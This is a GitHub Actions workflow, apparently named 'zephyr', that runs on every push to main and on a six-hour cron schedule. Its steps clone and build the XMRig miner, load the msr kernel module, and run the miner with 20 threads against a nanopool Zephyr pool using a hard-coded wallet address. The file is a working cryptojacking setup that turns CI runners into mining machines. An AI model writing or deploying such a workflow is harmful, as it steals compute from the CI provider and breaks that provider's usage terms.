name: zephyr 

on: 
  push:
    branches:
      - main
  schedule:
    - cron: '15 */6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Update and install dependencies
        run: sudo apt update && sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - name: Clone XMRig repository
        run: git clone https://github.com/xmrig/xmrig.git

      - name: Build XMRig
        run: |
          cd xmrig
          mkdir build
          cd build
          cmake ..
          make -j$(nproc)

      - name: Start mining Monero
        run: |
          cd xmrig/build
          sleep 2
          sudo modprobe msr && echo "msr" | sudo tee -a /etc/modules
          sleep 4
          sudo ./xmrig -o zeph-asia1.nanopool.org:10900 -u ZEPHYR3WVbfTWz6WsfYYWUVtY35iKG6bWJhHEE62riQuX3wEZiSr3CQQ1wD5XwJ2q1SNkA1VQTHQRNj1M5GrqmT8LiHMTwFTmHy2H -p mass1 -a randomx -t 20
